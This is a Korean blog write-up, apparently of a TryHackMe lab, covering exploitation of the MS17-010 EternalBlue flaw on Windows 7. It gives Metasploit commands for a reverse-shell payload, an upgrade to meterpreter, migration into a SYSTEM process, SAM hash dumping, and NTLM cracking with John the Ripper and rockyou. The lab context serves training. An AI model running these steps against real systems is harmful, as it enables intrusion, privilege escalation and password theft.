Task 1
- 타겟은 ms 관련 취약점을 가지고 있음
- site:https://learn.microsoft.com/en-us/security-updates/securitybulletins/ windows7 445
- MS17-010 취약점 (링크)
Task 2
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set rhosts
set payload windows/x64/shell/reverse_tcp
exploit
Task 3
1) meterpreter shell 진입
- 백그라운드 전환 (ctrl + z), background sesions 1
- meterpreter shell로 진입하기 위해 shell_to_meterpreter 이용
use post/multi/manage/shell_to_meterpreter
set session 1
exploit
※ shell_to_meterpreter 작동이 잘 안되는 경우 아래와 같이 시도하여 meterpreter shell 획득
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts
exploit
※ 세션 리스트 : sessions -l
2) meterpreter shell 실행 후 권한상승 시도
# 세션 실행
sessions 2
# meterpreter shell 실행 후, 침투한 windows 쉘 확인
meterpreter > shell
# 프로세스 확인
meterpreter > ps
# 특정 프로세스로 마이그레이션
meterpreter > migrate <PID>
마이그레이션 시, NT AUTHORITY\SYSTEM 권한으로 실행중인 프로세스로 마이그레이션 함.
이유는 당연히 최고권한을 얻기 위해서임
3) 패스워드 크랙
- hashdump
meterpreter > run hashdump
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# ...
# [!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
1st field : username
2nd field : rid
3rd field : LM hash
4th field : NTLM hash
아무튼 존의 계정정보 긁어옴
- 터미널 새로 열어서 크래킹
john jonhash
# Warning: detected hash type "LM", but the string is also recognized as "NT"
john jonhash --format=NT
#Warning: Only 2 candidates buffered for the current salt, minimum 24 needed for performance.
#Warning: Only 12 candidates buffered for the current salt, minimum 24 needed for performance.
#Almost done: Processing the remaining buffered candidate passwords, if any.
#Proceeding with wordlist:/opt/john/password.lst
#....
john jonhash --format=NT --wordlist=/usr/share/wordlist/rockyou.txt
#바로나옴
TASK 5.
flag 찾기
'System > 침투' 카테고리의 다른 글
THM Offensive Pentesting - Steel Mountain (0) | 2023.07.18 |
---|---|
THM Offensive Pentesting - Kenobi (0) | 2023.07.17 |
THM Offensive Pentesting - Vulnversity (0) | 2023.06.08 |
APC injection 실습 (2) (0) | 2023.03.31 |
APC Injection 실습 (1) (0) | 2023.03.30 |